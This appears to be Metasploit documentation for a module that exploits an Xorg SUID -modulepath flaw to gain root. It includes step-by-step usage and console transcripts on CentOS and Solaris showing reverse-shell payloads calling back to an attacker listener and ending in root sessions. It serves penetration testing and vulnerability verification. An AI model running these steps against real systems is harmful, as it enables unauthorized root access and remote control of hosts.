## Vulnerable Application

  For Xorg server versions below `v1.20.3`, there is an incorrect permissions
  check when starting Xorg with the `-modulepath` flag. That combined with Xorg
  being an SUID binary, users can execute arbitrary code as root.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/local/xorg_x11_suid_server_modulepath```
  4. Do: ```set SESSION <sess_no>```
  5. Do: ```set TARGET <target_no>```
  6. Do: ```run```
  7. You should get a shell with root privileges.

## Scenarios

### Xorg `v1.19.3` on Centos 7.4

  ```
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 172.16.215.1:4444
  [*] Sending stage (816260 bytes) to 172.16.215.159
  [*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.159:52816) at 2019-10-22 09:50:42 -0500

  meterpreter > getuid
  Server username: uid=1000, gid=1000, euid=1000, egid=1000
  meterpreter > sysinfo
  Computer     : localhost.localdomain
  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > background
  [*] Backgrounding session 1...
  msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 1
  session => 1
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
  lhost => 172.16.215.1
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check
  [+]  The target is vulnerable.
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

  [*] Started reverse TCP handler on 172.16.215.1:4444
  [+] Passed all initial checks for exploit
  [*] Writing launcher and compiling
  [*] Uploading your payload, this could take a while
  [*] Exploiting
  [*] Sending stage (816260 bytes) to 172.16.215.159
  [*] Meterpreter session 2 opened (172.16.215.1:4444 -> 172.16.215.159:52818) at 2019-10-22 09:51:38 -0500
  [+] Deleted /tmp/libglx.so
  [+] Deleted /tmp/.session-xehPZXcIrZ

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : localhost.localdomain
  OS           : CentOS 7.4.1708 (Linux 3.10.0-693.el7.x86_64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  ```

### Xorg `v1.19.5` on Solaris 11.4

  ```
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 172.16.215.1:4444
  [*] Command shell session 3 opened (172.16.215.1:4444 -> 172.16.215.152:49722) at 2019-10-22 09:27:45 -0500

  whoami
  space
  uname -a
  SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
  background

  Background session 3? [y/N]  y

  msf5 exploit(multi/handler) > use exploit/multi/local/xorg_x11_suid_server_modulepath 
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set payload cmd/unix/reverse_ksh
  payload => cmd/unix/reverse_ksh
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set lhost 172.16.215.1
  lhost => 172.16.215.1
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set session 3
  session => 3
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > set target 2
  target => 2
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > check

  [!] SESSION may not be compatible with this module.
  [+]  The target is vulnerable.
  msf5 exploit(multi/local/xorg_x11_suid_server_modulepath) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 172.16.215.1:4444 
  [+] Passed all initial checks for exploit
  [*] Writing launcher and compiling
  [*] Uploading your payload, this could take a while
  [*] Exploiting
  [*] Command shell session 4 opened (172.16.215.1:4444 -> 172.16.215.152:57420) at 2019-10-22 09:30:05 -0500
  [+] Deleted /tmp/qHkvGfpTTu.c
  [+] Deleted /tmp/libglx.so
  [+] Deleted /tmp/.session-jRlZ4zPfO

  whoami
  root
  uname -a
  SunOS solaris 5.11 11.4.0.15.0 i86pc i386 i86pc
  ```
